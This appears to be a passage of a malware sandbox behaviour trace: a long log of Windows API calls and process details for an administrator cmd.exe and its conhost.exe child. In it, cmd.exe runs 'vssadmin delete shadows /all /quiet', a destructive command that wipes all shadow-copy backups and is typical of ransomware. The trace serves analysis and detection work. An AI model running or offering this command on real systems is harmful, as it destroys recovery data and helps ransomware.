hFindFile=0x1ce53639270 | out: hFindFile=0x1ce53639270) returned 1 [0187.410] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0187.410] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0187.410] ??_V@YAXPEAX@Z () returned 0x1 [0187.410] GetConsoleTitleW (in: lpConsoleTitle=0x23aecff6f0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0187.411] GetProcessHeap () returned 0x1ce53620000 [0187.411] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x21c) returned 0x1ce53639d10 [0187.411] GetConsoleTitleW (in: lpConsoleTitle=0x1ce53639d20, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0187.412] GetProcessHeap () returned 0x1ce53620000 [0187.412] RtlReAllocateHeap (Heap=0x1ce53620000, Flags=0x0, Ptr=0x1ce53639d10, Size=0xc2) returned 0x1ce53639d10 [0187.412] GetProcessHeap () returned 0x1ce53620000 [0187.412] RtlSizeHeap (HeapHandle=0x1ce53620000, Flags=0x0, MemoryPointer=0x1ce53639d10) returned 0xc2 [0187.412] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe - vssadmin delete shadows /all /quiet") returned 1 [0187.414] GetProcessHeap () returned 0x1ce53620000 [0187.414] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53639d10) returned 1 [0187.414] InitializeProcThreadAttributeList (in: lpAttributeList=0x23aecff610, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x23aecff500 | out: lpAttributeList=0x23aecff610, lpSize=0x23aecff500) returned 1 [0187.414] UpdateProcThreadAttribute (in: lpAttributeList=0x23aecff610, dwFlags=0x0, Attribute=0x60001, lpValue=0x23aecff4ec, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x23aecff610, lpPreviousValue=0x0) returned 1 [0187.414] GetStartupInfoW (in: lpStartupInfo=0x23aecff5a0 | out: lpStartupInfo=0x23aecff5a0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x248, hStdOutput=0x254, hStdError=0x254)) [0187.415] GetProcessHeap () returned 0x1ce53620000 [0187.415] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x20) returned 0x1ce53626ef0 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0187.415] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0187.416] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0187.416] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0187.416] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0187.416] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0187.416] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0187.416] GetProcessHeap () returned 0x1ce53620000 [0187.416] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53626ef0) returned 1 [0187.416] GetProcessHeap () returned 0x1ce53620000 [0187.416] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x12) returned 0x1ce53626ef0 [0187.416] _get_osfhandle (_FileHandle=1) returned 0x254 [0187.416] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0187.416] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.416] SetConsoleMode (hConsoleHandle=0x248, dwMode=0x0) returned 0 [0187.416] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\WINDOWS\\system32", lpStartupInfo=0x23aecff530*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x23aecff508 | out: lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessInformation=0x23aecff508*(hProcess=0x94, hThread=0x98, dwProcessId=0x4a0, dwThreadId=0x36c)) returned 1 [0187.422] CloseHandle (hObject=0x98) returned 1 [0187.422] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0187.422] GetProcessHeap () returned 0x1ce53620000 [0187.422] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce5363b560) returned 1 [0187.422] GetEnvironmentStringsW () returned 0x1ce53625930* [0187.422] GetProcessHeap () returned 0x1ce53620000 [0187.422] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0xaea) returned 0x1ce5363aa60 [0187.422] FreeEnvironmentStringsA (penv="=") returned 1 [0187.422] NtQueryInformationProcess (in: ProcessHandle=0x94, ProcessInformationClass=0x0, ProcessInformation=0x23aecfea08, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x23aecfea08, ReturnLength=0x0) returned 0x0 [0187.422] ReadProcessMemory (in: hProcess=0x94, lpBaseAddress=0xf774bef000, lpBuffer=0x23aecfea40, nSize=0x7a0, lpNumberOfBytesRead=0x23aecfea00 | out: lpBuffer=0x23aecfea40*, lpNumberOfBytesRead=0x23aecfea00*=0x7a0) returned 1 [0187.423] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0xffffffff) returned 0x0 [0187.591] GetExitCodeProcess (in: hProcess=0x94, lpExitCode=0x23aecff488 | out: lpExitCode=0x23aecff488*=0x2) returned 1 [0187.591] CloseHandle (hObject=0x94) returned 1 [0187.591] _vsnwprintf (in: _Buffer=0x23aecff658, _BufferCount=0x13, _Format="%08X", _ArgList=0x23aecff498 | out: _Buffer="00000002") returned 8 [0187.591] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0187.591] GetProcessHeap () returned 0x1ce53620000 [0187.591] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce5363aa60) returned 1 [0187.591] GetEnvironmentStringsW () returned 0x1ce53625930* [0187.591] GetProcessHeap () returned 0x1ce53620000 [0187.591] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0xaea) returned 0x1ce5363aa60 [0187.591] FreeEnvironmentStringsA (penv="=") returned 1 [0187.591] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0187.591] GetProcessHeap () returned 0x1ce53620000 [0187.591] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce5363aa60) returned 1 [0187.591] GetEnvironmentStringsW () returned 0x1ce53625930* [0187.591] GetProcessHeap () returned 0x1ce53620000 [0187.591] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0xaea) returned 0x1ce5363aa60 [0187.591] FreeEnvironmentStringsA (penv="=") returned 1 [0187.591] GetProcessHeap () returned 0x1ce53620000 [0187.591] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53626ef0) returned 1 [0187.591] DeleteProcThreadAttributeList (in: lpAttributeList=0x23aecff610 | out: lpAttributeList=0x23aecff610) [0187.591] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 1 [0187.595] ??_V@YAXPEAX@Z () returned 0x1 [0187.595] _get_osfhandle (_FileHandle=1) returned 0x254 [0187.595] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0187.595] _get_osfhandle (_FileHandle=1) returned 0x254 [0187.595] GetConsoleMode (in: hConsoleHandle=0x254, lpMode=0x7ff69534fc08 | out: lpMode=0x7ff69534fc08) returned 0 [0187.595] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.595] GetConsoleMode (in: hConsoleHandle=0x248, lpMode=0x7ff69534fc0c | out: lpMode=0x7ff69534fc0c) returned 0 [0187.595] GetConsoleOutputCP () returned 0x4e3 [0187.596] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x7ff69534fbb0 | out: lpCPInfo=0x7ff69534fbb0) returned 1 [0187.596] SetThreadUILanguage (LangId=0x0) returned 0x409 [0187.597] GetProcessHeap () returned 0x1ce53620000 [0187.597] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53639c80) returned 1 [0187.597] GetProcessHeap () returned 0x1ce53620000 [0187.597] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53638ba0) returned 1 [0187.597] GetProcessHeap () returned 0x1ce53620000 [0187.597] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53639ac0) returned 1 [0187.597] GetProcessHeap () returned 0x1ce53620000 [0187.597] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce5363c060) returned 1 [0187.597] GetProcessHeap () returned 0x1ce53620000 [0187.597] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53639200) returned 1 [0187.597] GetProcessHeap () returned 0x1ce53620000 [0187.597] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53628bb0) returned 1 [0187.597] GetProcessHeap () returned 0x1ce53620000 [0187.597] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce536391b0) returned 1 [0187.597] GetProcessHeap () returned 0x1ce53620000 [0187.597] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53626c60) returned 1 [0187.597] GetProcessHeap () returned 0x1ce53620000 [0187.597] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53626e30) returned 1 [0187.597] _vsnwprintf (in: _Buffer=0x7ff695357f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x23aecffa38 | out: _Buffer="\r\n") returned 2 [0187.597] _get_osfhandle (_FileHandle=1) returned 0x254 [0187.597] GetFileType (hFile=0x254) returned 0x3 [0187.597] _get_osfhandle (_FileHandle=1) returned 0x254 [0187.598] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0187.598] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x23aecffa08, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x23aecffa08*=0x2, lpOverlapped=0x0) returned 1 [0187.598] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0187.598] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1ce537f0080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0187.598] _vsnwprintf (in: _Buffer=0x1ce53800060, _BufferCount=0x83e5, _Format="%s", _ArgList=0x23aecffa48 | out: _Buffer="C:\\WINDOWS\\system32") returned 19 [0187.598] _vsnwprintf (in: _Buffer=0x1ce53800086, _BufferCount=0x83d2, _Format="%c", _ArgList=0x23aecffa48 | out: _Buffer=">") returned 1 [0187.598] _get_osfhandle (_FileHandle=1) returned 0x254 [0187.598] GetFileType (hFile=0x254) returned 0x3 [0187.598] _get_osfhandle (_FileHandle=1) returned 0x254 [0187.598] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="C:\\WINDOWS\\system32>", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\WINDOWS\\system32>", lpUsedDefaultChar=0x0) returned 21 [0187.598] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x23aecffa38, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x23aecffa38*=0x14, lpOverlapped=0x0) returned 1 [0187.598] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.598] GetFileType (hFile=0x248) returned 0x3 [0187.598] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.598] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.598] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.598] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c30, cchWideChar=1 | out: lpWideCharStr="Essadmin delete shadows /all /quiet\n") returned 1 [0187.598] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.598] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.598] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.599] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c32, cchWideChar=1 | out: lpWideCharStr="xsadmin delete shadows /all /quiet\n") returned 1 [0187.599] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.599] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.599] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.599] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c34, cchWideChar=1 | out: lpWideCharStr="iadmin delete shadows /all /quiet\n") returned 1 [0187.599] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.599] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.599] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.599] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c36, cchWideChar=1 | out: lpWideCharStr="tdmin delete shadows /all /quiet\n") returned 1 [0187.599] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.599] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.599] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x23aecffd98, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x23aecffd98*=0x1, lpOverlapped=0x0) returned 1 [0187.599] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c38, cchWideChar=1 | out: lpWideCharStr="\nmin delete shadows /all /quiet\n") returned 1 [0187.599] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.599] GetFileType (hFile=0x248) returned 0x3 [0187.599] _get_osfhandle (_FileHandle=0) returned 0x248 [0187.599] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.599] _get_osfhandle (_FileHandle=1) returned 0x254 [0187.599] GetFileType (hFile=0x254) returned 0x3 [0187.599] _get_osfhandle (_FileHandle=1) returned 0x254 [0187.599] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="Exit\n", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Exit\n", lpUsedDefaultChar=0x0) returned 6 [0187.599] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x23aecffd38, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x23aecffd38*=0x5, lpOverlapped=0x0) returned 1 [0187.600] GetProcessHeap () returned 0x1ce53620000 [0187.600] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x4012) returned 0x1ce53628bb0 [0187.600] GetProcessHeap () returned 0x1ce53620000 [0187.600] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce53628bb0) returned 1 [0187.601] _wcsicmp (_String1="Exit", _String2=")") returned 60 [0187.601] _wcsicmp (_String1="FOR", _String2="Exit") returned 1 [0187.601] _wcsicmp (_String1="FOR/?", _String2="Exit") returned 1 [0187.601] _wcsicmp (_String1="IF", _String2="Exit") returned 4 [0187.601] _wcsicmp (_String1="IF/?", _String2="Exit") returned 4 [0187.601] _wcsicmp (_String1="REM", _String2="Exit") returned 13 [0187.601] _wcsicmp (_String1="REM/?", _String2="Exit") returned 13 [0187.601] GetProcessHeap () returned 0x1ce53620000 [0187.601] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0xb0) returned 0x1ce53626e30 [0187.601] GetProcessHeap () returned 0x1ce53620000 [0187.601] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x1a) returned 0x1ce53626c60 [0187.601] GetConsoleOutputCP () returned 0x4e3 [0187.603] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x7ff69534fbb0 | out: lpCPInfo=0x7ff69534fbb0) returned 1 [0187.603] SetThreadUILanguage (LangId=0x0) returned 0x409 [0187.603] GetConsoleTitleW (in: lpConsoleTitle=0x23aecffb80, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0187.604] malloc (_Size=0xffce) returned 0x1ce53810840 [0187.604] ??_V@YAXPEAX@Z () returned 0x1ce53810840 [0187.604] malloc (_Size=0xffce) returned 0x1ce53820820 [0187.604] ??_V@YAXPEAX@Z () returned 0x1ce53820820 [0187.605] _wcsicmp (_String1="Exit", _String2="DIR") returned 1 [0187.605] _wcsicmp (_String1="Exit", _String2="ERASE") returned 6 [0187.605] _wcsicmp (_String1="Exit", _String2="DEL") returned 1 [0187.605] _wcsicmp (_String1="Exit", _String2="TYPE") returned -15 [0187.605] _wcsicmp (_String1="Exit", _String2="COPY") returned 2 [0187.605] _wcsicmp (_String1="Exit", _String2="CD") returned 2 [0187.605] _wcsicmp (_String1="Exit", _String2="CHDIR") returned 2 [0187.605] _wcsicmp (_String1="Exit", _String2="RENAME") returned -13 [0187.605] _wcsicmp (_String1="Exit", _String2="REN") returned -13 [0187.605] _wcsicmp (_String1="Exit", _String2="ECHO") returned 21 [0187.605] _wcsicmp (_String1="Exit", _String2="SET") returned -14 [0187.605] _wcsicmp (_String1="Exit", _String2="PAUSE") returned -11 [0187.605] _wcsicmp (_String1="Exit", _String2="DATE") returned 1 [0187.605] _wcsicmp (_String1="Exit", _String2="TIME") returned -15 [0187.605] _wcsicmp (_String1="Exit", _String2="PROMPT") returned -11 [0187.605] _wcsicmp (_String1="Exit", _String2="MD") returned -8 [0187.605] _wcsicmp (_String1="Exit", _String2="MKDIR") returned -8 [0187.605] _wcsicmp (_String1="Exit", _String2="RD") returned -13 [0187.605] _wcsicmp (_String1="Exit", _String2="RMDIR") returned -13 [0187.605] _wcsicmp (_String1="Exit", _String2="PATH") returned -11 [0187.605] _wcsicmp (_String1="Exit", _String2="GOTO") returned -2 [0187.605] _wcsicmp (_String1="Exit", _String2="SHIFT") returned -14 [0187.605] _wcsicmp (_String1="Exit", _String2="CLS") returned 2 [0187.605] _wcsicmp (_String1="Exit", _String2="CALL") returned 2 [0187.605] _wcsicmp (_String1="Exit", _String2="VERIFY") returned -17 [0187.605] _wcsicmp (_String1="Exit", _String2="VER") returned -17 [0187.605] _wcsicmp (_String1="Exit", _String2="VOL") returned -17 [0187.605] _wcsicmp (_String1="Exit", _String2="EXIT") returned 0 [0187.605] ??_V@YAXPEAX@Z () returned 0x1 [0187.605] GetProcessHeap () returned 0x1ce53620000 [0187.605] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x14) returned 0x1ce53620810 [0187.605] GetProcessHeap () returned 0x1ce53620000 [0187.605] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x1a) returned 0x1ce53626ef0 [0187.605] GetProcessHeap () returned 0x1ce53620000 [0187.605] RtlAllocateHeap (HeapHandle=0x1ce53620000, Flags=0x8, Size=0x21c) returned 0x1ce536217d0 [0187.605] GetConsoleTitleW (in: lpConsoleTitle=0x1ce536217e0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 0x2b [0187.606] GetProcessHeap () returned 0x1ce53620000 [0187.606] RtlReAllocateHeap (Heap=0x1ce53620000, Flags=0x0, Ptr=0x1ce536217d0, Size=0x82) returned 0x1ce536217d0 [0187.606] GetProcessHeap () returned 0x1ce53620000 [0187.606] RtlSizeHeap (HeapHandle=0x1ce53620000, Flags=0x0, MemoryPointer=0x1ce536217d0) returned 0x82 [0187.606] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe - Exit") returned 1 [0187.609] GetProcessHeap () returned 0x1ce53620000 [0187.609] RtlFreeHeap (HeapHandle=0x1ce53620000, Flags=0x0, BaseAddress=0x1ce536217d0) returned 1 [0187.609] SetConsoleTitleW (lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 1 [0187.612] exit (_Code=2) Thread: id = 106 os_tid = 0x4cc Process: id = "14" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x4666000" os_pid = "0xc7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "13" os_parent_pid = "0xc40" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 88 os_tid = 0xc80 Thread: id = 99 os_tid = 0x4bc Thread: id = 100 os_tid = 0x384 Thread: id = 103 os_tid = 0x4d8 Thread: id = 105 os_tid = 0x4e8 Process: id = "15" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x8756000" os_pid = "0xbb0" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xe24" cmd_line = "\"C:\\WINDOWS\\system32\\cmd.exe\"" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 101 os_tid = 0x9c8 [0185.630] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff695310000 [0185.630] __set_app_type (_Type=0x1) [0185.630] SetUnhandledExceptionFilter 